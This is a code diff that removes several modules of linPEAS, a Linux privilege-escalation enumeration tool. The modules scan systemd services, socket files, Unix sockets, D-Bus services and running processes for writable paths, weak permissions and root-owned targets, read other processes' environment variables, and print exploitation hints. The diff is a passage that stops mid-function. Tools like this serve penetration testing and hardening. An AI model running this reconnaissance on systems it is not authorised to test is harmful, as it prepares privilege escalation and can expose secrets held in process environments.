-        version=$(systemctl --version | head -n 1 | grep -oE '([0-9]+(\.[0-9]+)+)')
-        if [ -n "$version" ]; then
-            echo "$version" | sed -${E} "s,([0-9]+(\.[0-9]+)+),${SED_RED},g"
-            # Check for known vulnerable versions
-            case "$version" in
-                "2.3"[0-4]|"2.3"[0-4]"."*)
-                    echo "  └─ Vulnerable to CVE-2021-4034 (Polkit)" | sed -${E} "s,.*,${SED_RED},g"
-                    ;;
-                "2.4"[0-9]|"2.4"[0-9]"."*)
-                    echo "  └─ Vulnerable to CVE-2021-33910 (systemd-tmpfiles)" | sed -${E} "s,.*,${SED_RED},g"
-                    ;;
-            esac
-        fi
-    fi
-
-    # Check for systemd services running as root
-    print_list "Services running as root? ..... "$NC
-    if check_systemctl; then
-        systemctl list-units --type=service --state=running 2>/dev/null | 
-        grep -E "root|0:0" | 
-        while read -r line; do
-            service=$(echo "$line" | awk '{print $1}')
-            user=$(systemctl show "$service" -p User 2>/dev/null | cut -d= -f2)
-            echo "$service (User: $user)" | sed -${E} "s,root|0:0,${SED_RED},g"
-        done
-        echo ""
-    else
-        echo ""
-    fi
-
-    # Check for systemd services with dangerous capabilities
-    print_list "Running services with dangerous capabilities? ... "$NC
-    if check_systemctl; then
-        systemctl list-units --type=service --state=running 2>/dev/null | 
-        grep -E "\.service" | 
-        while read -r line; do
-            service=$(echo "$line" | awk '{print $1}')
-            caps=$(systemctl show "$service" -p CapabilityBoundingSet 2>/dev/null | cut -d= -f2)
-            if [ -n "$caps" ] && check_dangerous_caps "$caps"; then
-                echo "$service: $caps" | sed -${E} "s,.*,${SED_RED},g"
-            fi
-        done
-        echo ""
-    else
-        echo ""
-    fi
-
-    # Check for systemd services with writable paths
-    print_list "Services with writable paths? . "$NC
-    if check_systemctl; then
-        systemctl list-units --type=service --state=running 2>/dev/null | 
-        grep -E "\.service" | 
-        while read -r line; do
-            service=$(echo "$line" | awk '{print $1}')
-            service_file=$(get_service_file "$service")
-            if [ -n "$service_file" ]; then
-                # Check ExecStart paths
-                grep -E "ExecStart|ExecStartPre|ExecStartPost" "$service_file" 2>/dev/null | 
-                while read -r exec_line; do
-                    # Extract the first word after ExecStart* as the command
-                    cmd=$(echo "$exec_line" | awk '{print $2}' | tr -d '"')
-                    # Extract the rest as arguments
-                    args=$(echo "$exec_line" | awk '{$1=$2=""; print $0}' | tr -d '"')
-                    
-                    # Only check the command path, not arguments
-                    if [ -n "$cmd" ] && [ -w "$cmd" ]; then
-                        echo "$service: $cmd (from $exec_line)" | sed -${E} "s,.*,${SED_RED},g"
-                    fi
-                    # Check for relative paths only in the command, not arguments
-                    if [ -n "$cmd" ] && [ "${cmd#/}" = "$cmd" ] && ! echo "$cmd" | grep -qE '^-|^--'; then
-                        echo "$service: Uses relative path '$cmd' (from $exec_line)" | sed -${E} "s,.*,${SED_RED},g"
-                    fi
-                done
-            fi
-        done
-    else
-        echo ""
-    fi
-
-    echo ""
-
-    print_2title "Systemd PATH"
-    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths"
-    if check_systemctl; then
-        systemctl show-environment 2>/dev/null | 
-        grep "PATH" | 
-        while read -r path_line; do
-            echo "$path_line" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g"
-            # Store writable paths for later use
-            if echo "$path_line" | grep -qE "$Wfolders"; then
-                WRITABLESYSTEMDPATH="$path_line"
-            fi
-        done
-    fi
-
-    echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/12_Socket_files.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/12_Socket_files.sh
@ -1,146 +0,0 @@
-# Title: Processes & Cron & Services & Timers - Socket Files Analysis
-# ID: PR_Socket_files
-# Author: Carlos Polop
-# Last Update: 2024-03-19
-# Description: Analyze .socket files for privilege escalation vectors:
-#   - Writable socket files
-#   - Socket files executing writable binaries
-#   - Socket files with writable listeners
-#   - Socket files with relative paths
-#   - Socket files with unsafe configurations
-# License: GNU GPL
-# Version: 1.2
-# Functions Used: print_2title, print_info, print_list
-# Global Variables: $IAMROOT, $SEARCH_IN_FOLDER, $SED_RED, $SED_RED_YELLOW, $NC
-# Initial Functions:
-# Generated Global Variables: $exec_path, $listen_path, $path, $exec_paths, $finding, $listen_paths, $socket_file, $findings, $target_file, $target_listen, $target_exec, $lpath
-# Fat linpeas: 0
-# Small linpeas: 0
-
-if ! [ "$IAMROOT" ]; then
-    print_2title "Analyzing .socket files"
-    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets"
-
-    # Function to check if path is relative
-    is_relative_path() {
-        local lpath="$1"
-        case "$lpath" in
-            /*) return 1 ;; # Absolute path
-            *) return 0 ;;  # Relative path
-        esac
-    }
-
-    # Function to check socket file content
-    check_socket_file() {
-        local socket_file="$1"
-        local findings=""
-
-        # Check if socket file is writable (following symlinks)
-        if [ -L "$socket_file" ]; then
-            # If it's a symlink, check the target file
-            local target_file=$(readlink -f "$socket_file")
-            if ! [ "$IAMROOT" ] && [ -w "$target_file" ] && [ -f "$target_file" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
-                findings="${findings}WRITABLE_FILE: Socket target file is writable: $target_file\n"
-            fi
-        elif ! [ "$IAMROOT" ] && [ -w "$socket_file" ] && [ -f "$socket_file" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
-            findings="${findings}WRITABLE_FILE: Socket file is writable\n"
-        fi
-
-        # Check for weak permissions (following symlinks)
-        if [ "$(stat -L -c %a "$socket_file" 2>/dev/null)" = "777" ]; then
-            findings="${findings}WEAK_PERMS: Socket file has 777 permissions\n"
-        fi
-
-        # Check for executables (following symlinks)
-        local exec_paths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$socket_file" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
-        printf "%s\n" "$exec_paths" | while read -r exec_path; do
-            if [ -n "$exec_path" ]; then
-                # Check if executable is writable (following symlinks)
-                if [ -L "$exec_path" ]; then
-                    local target_exec=$(readlink -f "$exec_path")
-                    if [ -w "$target_exec" ]; then
-                        findings="${findings}WRITABLE_EXEC: Executable target is writable: $target_exec\n"
-                    fi
-                    # Check for weak permissions on target
-                    if [ -e "$target_exec" ] && [ "$(stat -L -c %a "$target_exec" 2>/dev/null)" = "777" ]; then
-                        findings="${findings}WEAK_EXEC_PERMS: Executable target has 777 permissions: $target_exec\n"
-                    fi
-                else
-                    if [ -w "$exec_path" ]; then
-                        findings="${findings}WRITABLE_EXEC: Executable is writable: $exec_path\n"
-                    fi
-                    # Check for weak permissions
-                    if [ -e "$exec_path" ] && [ "$(stat -L -c %a "$exec_path" 2>/dev/null)" = "777" ]; then
-                        findings="${findings}WEAK_EXEC_PERMS: Executable has 777 permissions: $exec_path\n"
-                    fi
-                fi
-                # Check for relative paths
-                if is_relative_path "$exec_path"; then
-                    findings="${findings}RELATIVE_PATH: Uses relative path: $exec_path\n"
-                fi
-            fi
-        done
-
-        # Check for listeners (following symlinks)
-        local listen_paths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$socket_file" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
-        printf "%s\n" "$listen_paths" | while read -r listen_path; do
-            if [ -n "$listen_path" ]; then
-                # Check if listener path is writable (following symlinks)
-                if [ -L "$listen_path" ]; then
-                    local target_listen=$(readlink -f "$listen_path")
-                    if [ -w "$target_listen" ]; then
-                        findings="${findings}WRITABLE_LISTENER: Listener target path is writable: $target_listen\n"
-                    fi
-                    # Check for weak permissions on target
-                    if [ -e "$target_listen" ] && [ "$(stat -L -c %a "$target_listen" 2>/dev/null)" = "777" ]; then
-                        findings="${findings}WEAK_LISTENER_PERMS: Listener target path has 777 permissions: $target_listen\n"
-                    fi
-                else
-                    if [ -w "$listen_path" ]; then
-                        findings="${findings}WRITABLE_LISTENER: Listener path is writable: $listen_path\n"
-                    fi
-                    # Check for weak permissions
-                    if [ -e "$listen_path" ] && [ "$(stat -L -c %a "$listen_path" 2>/dev/null)" = "777" ]; then
-                        findings="${findings}WEAK_LISTENER_PERMS: Listener path has 777 permissions: $listen_path\n"
-                    fi
-                fi
-                # Check for relative paths
-                if is_relative_path "$listen_path"; then
-                    findings="${findings}RELATIVE_LISTENER: Uses relative path: $listen_path\n"
-                fi
-            fi
-        done
-
-        # Check for unsafe configurations
-        if grep -qE '^(User|Group)=root' "$socket_file" 2>/dev/null; then
-            findings="${findings}ROOT_USER: Socket runs as root\n"
-        fi
-        if grep -qE '^(CapabilityBoundingSet).*CAP_SYS_ADMIN' "$socket_file" 2>/dev/null; then
-            findings="${findings}DANGEROUS_CAPS: Has dangerous capabilities\n"
-        fi
-        if grep -qE '^(BindIP|BindIPv6Only)=yes' "$socket_file" 2>/dev/null; then
-            findings="${findings}NETWORK_BIND: Can bind to network interfaces\n"
-        fi
-
-        # If any findings, print them
-        if [ -n "$findings" ]; then
-            echo "Potential privilege escalation in socket file: $socket_file"
-            echo "$findings" | while read -r finding; do
-                [ -n "$finding" ] && echo "  └─ $finding" | sed -${E} "s,WRITABLE.*,${SED_RED},g" | sed -${E} "s,RELATIVE.*,${SED_RED_YELLOW},g"
-            done
-        fi
-    }
-
-    # Process each socket file
-    if [ -n "$PSTORAGE_SOCKET" ]; then
-        printf "%s\n" "$PSTORAGE_SOCKET" | while read -r socket_file; do
-            if [ -n "$socket_file" ] && [ -e "$socket_file" ]; then
-                check_socket_file "$socket_file"
-            fi
-        done
-    else
-        print_list "No socket files found" "$NC"
-    fi
-
-    echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/13_Unix_sockets_listening.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/13_Unix_sockets_listening.sh
@ -1,151 +0,0 @@
-# Title: Processes & Cron & Services & Timers - Unix Sockets Analysis
-# ID: PR_Unix_sockets_listening
-# Author: Carlos Polop
-# Last Update: 2024-03-19
-# Description: Analyze Unix sockets for privilege escalation vectors:
-#   - Listening Unix sockets
-#   - Socket file permissions
-#   - Socket ownership
-#   - Socket connectivity
-#   - Socket protocol analysis
-# License: GNU GPL
-# Version: 1.1
-# Functions Used: print_2title, print_info
-# Global Variables: $EXTRA_CHECKS, $groupsB, $groupsVB, $IAMROOT, $idB, $knw_grps, $knw_usrs, $nosh_usrs, $SEARCH_IN_FOLDER, $sh_usrs, $USER, $SED_RED, $SED_GREEN, $NC, $RED
-# Initial Functions:
-# Generated Global Variables: $unix_scks_list, $unix_scks_list2, $perms, $owner, $owner_info, $response, $socket, $cmd, $mode, $group
-# Fat linpeas: 0
-# Small linpeas: 0
-
-if ! [ "$IAMROOT" ]; then
-    if ! [ "$SEARCH_IN_FOLDER" ]; then
-        print_2title "Unix Sockets Analysis"
-        print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets"
-
-
-        # Function to get socket permissions
-        get_socket_perms() {
-            local socket="$1"
-            local perms=""
-            
-            # Check read permission
-            if [ -r "$socket" ]; then
-                perms="Read "
-            fi
-            
-            # Check write permission
-            if [ -w "$socket" ]; then
-                perms="${perms}Write "
-            fi
-            
-            # Check execute permission
-            if [ -x "$socket" ]; then
-                perms="${perms}Execute "
-            fi
-            
-            # Check socket mode
-            local mode=$(stat -c "%a" "$socket" 2>/dev/null)
-            if [ "$mode" = "777" ] || [ "$mode" = "666" ]; then
-                perms="${perms}(Weak Permissions: $mode) "
-            fi
-            
-            echo "$perms"
-        }
-
-        # Function to check socket connectivity
-        check_socket_connectivity() {
-            local socket="$1"
-            local perms="$2"
-            
-            if [ "$EXTRA_CHECKS" ] && command -v curl >/dev/null 2>&1; then
-                # Try to connect to the socket
-                if curl -v --unix-socket "$socket" --max-time 1 http:/linpeas 2>&1 | grep -iq "Permission denied"; then
-                    perms="${perms} - Cannot Connect"
-                else
-                    perms="${perms} - Can Connect"
-                fi
-            fi
-            
-            echo "$perms"
-        }
-
-        # Function to analyze socket protocol
-        analyze_socket_protocol() {
-            local socket="$1"
-            local owner="$2"
-            local response=""
-            
-            # Try to get HTTP response
-            if command -v curl >/dev/null 2>&1; then
-                response=$(curl --max-time 2 --unix-socket "$socket" http:/index 2>/dev/null)
-                if [ $? -eq 0 ]; then
-                    echo "  └─ HTTP Socket (owned by $owner):" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
-                    echo "     └─ Response to /index (limit 30):"
-                    echo "$response" | head -n 30 | sed 's/^/       /'
-                fi
-            fi
-        }
-
-        # Function to get socket owner and group
-        get_socket_owner() {
-            local socket="$1"
-            local owner=""
-            local group=""
-            
-            if [ -e "$socket" ]; then
-                owner=$(ls -l "$socket" 2>/dev/null | awk '{print $3}')
-                group=$(ls -l "$socket" 2>/dev/null | awk '{print $4}')
-                echo "$owner:$group"
-            fi
-        }
-
-        # Collect listening sockets using multiple methods
-        unix_scks_list=""
-        for cmd in "ss -xlp -H state listening" "ss -l -p -A 'unix'" "netstat -a -p --unix"; do
-            if [ -z "$unix_scks_list" ]; then
-                unix_scks_list=$($cmd 2>/dev/null | grep -Eo "/[a-zA-Z0-9\._/\-]+" | grep -v " " | sort -u)
-            fi
-        done
-
-        # Get additional socket information
-        if [ -z "$unix_scks_list" ]; then
-            unix_scks_list=$(lsof -U 2>/dev/null | awk '{print $9}' | grep "/" | sort -u)
-        fi
-
-        # Find socket files
-        if ! [ "$SEARCH_IN_FOLDER" ]; then
-            unix_scks_list2=$(find / -type s 2>/dev/null)
-        else
-            unix_scks_list2=$(find "$SEARCH_IN_FOLDER" -type s 2>/dev/null)
-        fi
-
-        # Process all found sockets
-        (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort -u | while read -r socket; do
-            if [ -n "$socket" ] && [ -e "$socket" ]; then
-                # Get socket information
-                perms=$(get_socket_perms "$socket")
-                perms=$(check_socket_connectivity "$socket" "$perms")
-                owner_info=$(get_socket_owner "$socket")
-                
-                # Print socket information
-                if [ -z "$perms" ]; then
-                    echo "$socket" | sed -${E} "s,$socket,${SED_GREEN},g"
-                else
-                    echo "$socket" | sed -${E} "s,$socket,${SED_RED},g"
-                    echo "  └─(${RED}${perms}${NC})" | sed -${E} "s,Cannot Connect,${SED_GREEN},g"
-                    
-                    # Analyze socket protocol if we can connect
-                    if echo "$perms" | grep -q "Can Connect"; then
-                        analyze_socket_protocol "$socket" "$owner_info"
-                    fi
-                    
-                    # Highlight dangerous ownership
-                    if echo "$owner_info" | grep -q "root"; then
-                        echo "  └─(${RED}Owned by root${NC})"
-                    fi
-                fi
-            fi
-        done
-    fi
-    echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/14_DBus_analysis.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/14_DBus_analysis.sh
@ -1,253 +0,0 @@
-# Title: Processes & Cron & Services & Timers - D-Bus Analysis
-# ID: PR_DBus_analysis
-# Author: Carlos Polop
-# Last Update: 2024-03-19
-# Description: Comprehensive D-Bus analysis for privilege escalation vectors:
-#   - D-Bus Service Objects enumeration
-#   - D-Bus Service Object permissions and ownership
-#   - D-Bus Configuration files analysis
-#   - D-Bus Policy analysis
-#   - D-Bus Method and Interface analysis
-#   - D-Bus Privilege Escalation Vectors
-# License: GNU GPL
-# Version: 1.3
-# Functions Used: print_2title, print_3title, print_info, echo_not_found
-# Global Variables: $IAMROOT, $mygroups, $nosh_usrs, $SEARCH_IN_FOLDER, $sh_usrs, $USER, $dbuslistG, $knw_usrs, $rootcommon, $SED_RED, $SED_GREEN, $SED_BLUE, $SED_LIGHT_CYAN, $SED_LIGHT_MAGENTA, $NC
-# Initial Functions:
-# Generated Global Variables: $dbuslist, $srvc_object, $genpol, $userpol, $grppol, $dangerous_service, $pattern, $dir, $weak_policies, $dangerous_services, $dangerous, $dbussrvc_object, $patterns, $methods, $file, $dbusservice, $session_services, $prop, $dangerous_session_services, $interface, $dangerous_methods, $dbus_file, $dbus_service, $method, $dangerous_patterns, $properties, $interfaces, $dangerous_props, $service, $info, $allow_rules
-# Fat linpeas: 0
-# Small linpeas: 1
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-    print_2title "D-Bus Analysis"
-    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus"
-
-
-    # Function to check for dangerous methods
-    check_dangerous_methods() {
-        service="$1"
-        interface="$2"
-        dangerous=0
-        dangerous_methods=""
-        
-        # Common dangerous method patterns - using space-separated string instead of array
-        patterns="StartUnit StopUnit RestartUnit EnableUnit DisableUnit SetProperty SetUser SetPassword CreateUser DeleteUser ModifyUser Execute Run Spawn Shell Command Exec Authenticate Login Logout Reboot Shutdown PowerOff Suspend Hibernate Update Install Uninstall Configure Modify Change Delete Remove Add Create Write Read Access Grant Revoke Allow Deny"
-        
-        # Get methods for the interface
-        methods=$(busctl introspect "$service" "$interface" 2>/dev/null | grep "method" | awk '{print $2}')
-        
-        # Check each method against dangerous patterns
-        for method in $methods; do
-            for pattern in $patterns; do
-                if echo "$method" | grep -qi "$pattern"; then
-                    dangerous=1
-                    dangerous_methods="${dangerous_methods}${method} "
-                fi
-            done
-        done
-        
-        if [ "$dangerous" -eq 1 ]; then
-            echo "  └─(${RED}Potentially dangerous methods found${NC})"
-            echo "     └─ $dangerous_methods" | sed 's/^/        /'
-        fi
-        
-        return $dangerous
-    }
-
-    # Function to check for dangerous properties
-    check_dangerous_properties() {
-        service="$1"
-        interface="$2"
-        dangerous=0
-        dangerous_props=""
-        
-        # Common dangerous property patterns - using space-separated string instead of array
-        patterns="Executable Command Path User Group Permission Access Auth Password Secret Key Token Credential Config Setting Policy Rule Allow Deny Write Read Execute"
-        
-        # Get properties for the interface
-        properties=$(busctl introspect "$service" "$interface" 2>/dev/null | grep "property" | awk '{print $2}')
-        
-        # Check each property against dangerous patterns
-        for prop in $properties; do
-            for pattern in $patterns; do
-                if echo "$prop" | grep -qi "$pattern"; then
-                    dangerous=1
-                    dangerous_props="${dangerous_props}${prop} "
-                fi
-            done
-        done
-        
-        if [ "$dangerous" -eq 1 ]; then
-            echo "  └─(${RED}Potentially dangerous properties found${NC})"
-            echo "     └─ $dangerous_props" | sed 's/^/        /'
-        fi
-        
-        return $dangerous
-    }
-
-    # Function to analyze service object
-    analyze_service_object() {
-        dbusservice="$1"
-        info=""
-        dangerous=0
-        
-        # Get service status
-        info=$(busctl status "$dbusservice" 2>/dev/null)
-        
-        # Check for root ownership
-        if echo "$info" | grep -qE "^(UID|EUID|OwnerUID)=0"; then
-            echo "  └─(${RED}Running as root${NC})"
-            dangerous=1
-        fi
-        
-        # Get service interfaces
-        interfaces=$(busctl tree "$dbusservice" 2>/dev/null)
-        if [ -n "$interfaces" ]; then
-            echo "  └─ Interfaces:"
-            echo "$interfaces" | sed 's/^/     /'
-            
-            # Check each interface for dangerous methods and properties
-            echo "$interfaces" | while read -r interface; do
-                if [ -n "$interface" ]; then
-                    if check_dangerous_methods "$dbusservice" "$interface"; then
-                        dangerous=1
-                    fi
-                    if check_dangerous_properties "$dbusservice" "$interface"; then
-                        dangerous=1
-                    fi
-                fi
-            done
-        fi
-        
-        # Check for known dangerous services - using space-separated string instead of array
-        dangerous_services="org.freedesktop.systemd1 org.freedesktop.PolicyKit1 org.freedesktop.Accounts org.freedesktop.login1 org.freedesktop.hostname1 org.freedesktop.timedate1 org.freedesktop.locale1 org.freedesktop.machine1 org.freedesktop.portable1 org.freedesktop.resolve1 org.freedesktop.timesync1 org.freedesktop.import1 org.freedesktop.export1 org.gnome.SettingsDaemon org.gnome.Shell org.gnome.SessionManager org.gnome.DisplayManager org.gnome.ScreenSaver"
-        
-        for dangerous_service in $dangerous_services; do
-            if echo "$dbusservice" | grep -qi "$dangerous_service"; then
-                echo "  └─(${RED}Known dangerous service: $dangerous_service${NC})"
-                dangerous=1
-            fi
-        done
-        
-        # If service is dangerous, provide exploitation hints
-        if [ "$dangerous" -eq 1 ]; then
-            echo "  └─(${RED}Potential privilege escalation vector${NC})"
-            echo "     └─ Try: busctl call $dbusservice / [Interface] [Method] [Arguments]"
-            echo "     └─ Or: dbus-send --session --dest=$dbusservice / [Interface] [Method] [Arguments]"
-        fi
-    }
-
-    # Function to analyze policy file
-    analyze_policy_file() {
-        file="$1"
-        weak_policies=0
-        
-        # Check file permissions
-        if ! [ "$IAMROOT" ] && [ -w "$file" ]; then
-            echo "  └─(${RED}Writable policy file${NC})"
-            weak_policies=$((weak_policies + 1))
-        fi
-        
-        # Check general policy
-        genpol=$(grep "<policy>" "$file" 2>/dev/null)
-        if [ -n "$genpol" ]; then
-            echo "  └─(${RED}Weak general policy found${NC})"
-            echo "     └─ $genpol" | sed 's/^/        /'
-            weak_policies=$((weak_policies + 1))
-        fi
-        
-        # Check user policies
-        userpol=$(grep "<policy user=" "$file" 2>/dev/null | grep -v "root")
-        if [ -n "$userpol" ]; then
-            echo "  └─(${RED}Weak user policy found${NC})"
-            echo "     └─ $userpol" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g"
-            weak_policies=$((weak_policies + 1))
-        fi
-        
-        # Check group policies
-        grppol=$(grep "<policy group=" "$file" 2>/dev/null | grep -v "root")
-        if [ -n "$grppol" ]; then
-            echo "  └─(${RED}Weak group policy found${NC})"
-            echo "     └─ $grppol" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"
-            weak_policies=$((weak_policies + 1))
-        fi
-        
-        # Check for allow rules in default context
-        allow_rules=$(grep -A 5 "context=\"default\"" "$file" 2>/dev/null | grep "allow")
-        if [ -n "$allow_rules" ]; then
-            echo "  └─(${RED}Allow rules in default context${NC})"
-            echo "     └─ $allow_rules" | sed 's/^/        /'
-            weak_policies=$((weak_policies + 1))
-        fi
-        
-        # Check for specific dangerous policy patterns - using space-separated string instead of array
-        dangerous_patterns="allow_any allow_all allow_root allow_user allow_group allow_anonymous allow_any_user allow_any_group allow_any_uid allow_any_gid allow_any_pid allow_any_connection allow_any_method allow_any_property allow_any_signal allow_any_interface allow_any_path allow_any_destination allow_any_sender allow_any_receiver"
-        
-        for pattern in $dangerous_patterns; do
-            if grep -qi "$pattern" "$file" 2>/dev/null; then
-                echo "  └─(${RED}Dangerous policy pattern found: $pattern${NC})"
-                weak_policies=$((weak_policies + 1))
-            fi
-        done
-        
-        return $weak_policies
-    }
-
-    # Analyze D-Bus Service Objects
-    dbuslist=$(busctl list 2>/dev/null)
-    if [ -n "$dbuslist" ]; then
-        echo "$dbuslist" | while read -r dbus_service; do
-            # Print service name with highlighting
-            echo "$dbus_service" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
-            
-            # Analyze service if it's not in the known list
-            if ! echo "$dbus_service" | grep -qE "$dbuslistG"; then
-                dbussrvc_object=$(echo "$dbus_service" | cut -d " " -f1)
-                analyze_service_object "$dbussrvc_object"
-            fi
-        done
-    else
-        echo_not_found "busctl"
-    fi
-
-    # Analyze D-Bus Configuration Files
-    if [ "$PSTORAGE_DBUS" ]; then
-        echo ""
-        print_2title "D-Bus Configuration Files"
-        echo "$PSTORAGE_DBUS" | while read -r dir; do
-            for dbus_file in "$dir"/*; do
-                if [ -f "$dbus_file" ]; then
-                    echo "Analyzing $dbus_file:"
-                    if analyze_policy_file "$dbus_file"; then
-                        echo "  └─(${RED}Multiple weak policies found${NC})"
-                    fi
-                fi
-            done
-        done
-    fi
-
-    # Check for D-Bus session bus
-    if command -v dbus-send >/dev/null 2>&1; then
-        echo ""
-        print_3title "D-Bus Session Bus Analysis"
-        if dbus-send --session --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames 2>/dev/null | grep -q "Error"; then
-            echo "(${RED}No access to session bus${NC})"
-        else
-            echo "(${GREEN}Access to session bus available${NC})"
-            # List available services on session bus
-            session_services=$(dbus-send --session --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames 2>/dev/null | grep "string" | sed 's/^/     /')
-            echo "$session_services"
-            
-            # Check for known dangerous session services - using space-separated string instead of array
-            dangerous_session_services="org.gnome.SettingsDaemon org.gnome.Shell org.gnome.SessionManager org.gnome.DisplayManager org.gnome.ScreenSaver org.freedesktop.Notifications org.freedesktop.ScreenSaver org.freedesktop.PowerManagement org.freedesktop.UPower org.freedesktop.NetworkManager org.freedesktop.Avahi org.freedesktop.UDisks2 org.freedesktop.ModemManager1 org.freedesktop.PackageKit org.freedesktop.PolicyKit1 org.freedesktop.systemd1 org.freedesktop.Accounts org.freedesktop.login1"
-            
-            for dangerous_service in $dangerous_session_services; do
-                if echo "$session_services" | grep -qi "$dangerous_service"; then
-                    echo "  └─(${RED}Known dangerous session service: $dangerous_service${NC})"
-                    echo "     └─ Try: dbus-send --session --dest=$dangerous_service / [Interface] [Method] [Arguments]"
-                fi
-            done
-        fi
-    fi
-fi
-echo ""
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/1_List_processes.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/1_List_processes.sh
@ -1,265 +0,0 @@
-# Title: Processes & Cron & Services & Timers - List processes
-# ID: PR_List_processes
-# Author: Carlos Polop
-# Last Update: 2024-03-19
-# Description: List running processes and check for unusual configurations
-# License: GNU GPL
-# Version: 1.4
-# Functions Used: print_2title, print_info, print_ps
-# Global Variables: $capsB, $knw_usrs, $nosh_usrs, $NOUSEPS, $processesB, $processesDump, $processesVB, $rootcommon, $SEARCH_IN_FOLDER, $sh_usrs, $USER, $Wfolders
-# Initial Functions:
-# Generated Global Variables: $pslist, $cpid, $caphex, $psline, $pid, $selinux_ctx, $current_env_vars, $env_findings, $apparmor_profile, $mount, $mount_findings, $fd_findings, $proc_cmd, $proc_user, $mount_point, $current_mounts, $fd_target, $var, $findings, $sec_findings, $proc_env_vars, $fd_count, $proc_mounts, $$escaped_var
-# Fat linpeas: 0
-# Small linpeas: 1
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  print_2title "Running processes (cleaned)"
-
-  if [ "$NOUSEPS" ]; then
-    printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC
-  fi
-  print_info "Check weird & unexpected processes run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes"
-
-  if [ -f "/etc/fstab" ] && cat /etc/fstab | grep -q "hidepid=2"; then
-    echo "Looks like /etc/fstab has hidepid=2, so ps will not show processes of other users"
-  fi
-
-  # Get current process environment variables
-  if [ -r "/proc/self/environ" ]; then
-    current_env_vars=$(cat /proc/self/environ 2>/dev/null | tr '\0' '\n' | sort)
-  else
-    current_env_vars=$(env 2>/dev/null | sort)
-  fi
-  
-  # Get current process mounts
-  if [ -r "/proc/self/mountinfo" ]; then
-    current_mounts=$(cat /proc/self/mountinfo 2>/dev/null | sort)
-  else
-    current_mounts=$(mount 2>/dev/null | sort)
-  fi
-
-  # Function to check for unusual environment variables
-  check_env_vars() {
-    local pid="$1"
-    local proc_user="$2"
-    local proc_cmd="$3"
-    local findings=""
-    
-    # Skip if we can't read the environment
-    [ ! -r "/proc/$pid/environ" ] && return
-    
-    # Get process environment variables
-    proc_env_vars=$(cat "/proc/$pid/environ" 2>/dev/null | tr '\0' '\n' | sort)
-    [ -z "$proc_env_vars" ] && return
-
-    # Find environment variables that the target process has but we don't
-    if [ -n "$current_env_vars" ]; then
-      echo "$proc_env_vars" | while read -r var; do
-        if [ -n "$var" ]; then
-          # Escape special regex characters in var
-          escaped_var=$(echo "$var" | sed 's/[][^$.*+?(){}|]/\\&/g')
-          if ! echo "$current_env_vars" | grep -q "^$escaped_var$"; then
-            if [ -z "$findings" ]; then
-              findings="Has additional environment variables:"
-            fi
-            findings="$findings\n  └─ $var"
-          fi
-        fi
-      done
-    else
-      # If we can't get current env vars, just show all process env vars
-      findings="Has environment variables:"
-      echo "$proc_env_vars" | while read -r var; do
-        if [ -n "$var" ]; then
-          findings="$findings\n  └─ $var"
-        fi
-      done
-    fi
-
-    # Return findings if any
-    if [ -n "$findings" ]; then
-      echo "$findings"
-    fi
-  }
-
-  # Function to check for unusual security contexts
-  check_security_context() {
-    local pid="$1"
-    local proc_user="$2"
-    local proc_cmd="$3"
-    local findings=""
-    
-    # Check SELinux context
-    if [ -r "/proc/$pid/attr/current" ]; then
-      selinux_ctx=$(cat "/proc/$pid/attr/current" 2>/dev/null)
-      if [ -n "$selinux_ctx" ] && [ "$selinux_ctx" != "unconfined" ]; then
-        findings="SELinux context: $selinux_ctx"
-      fi
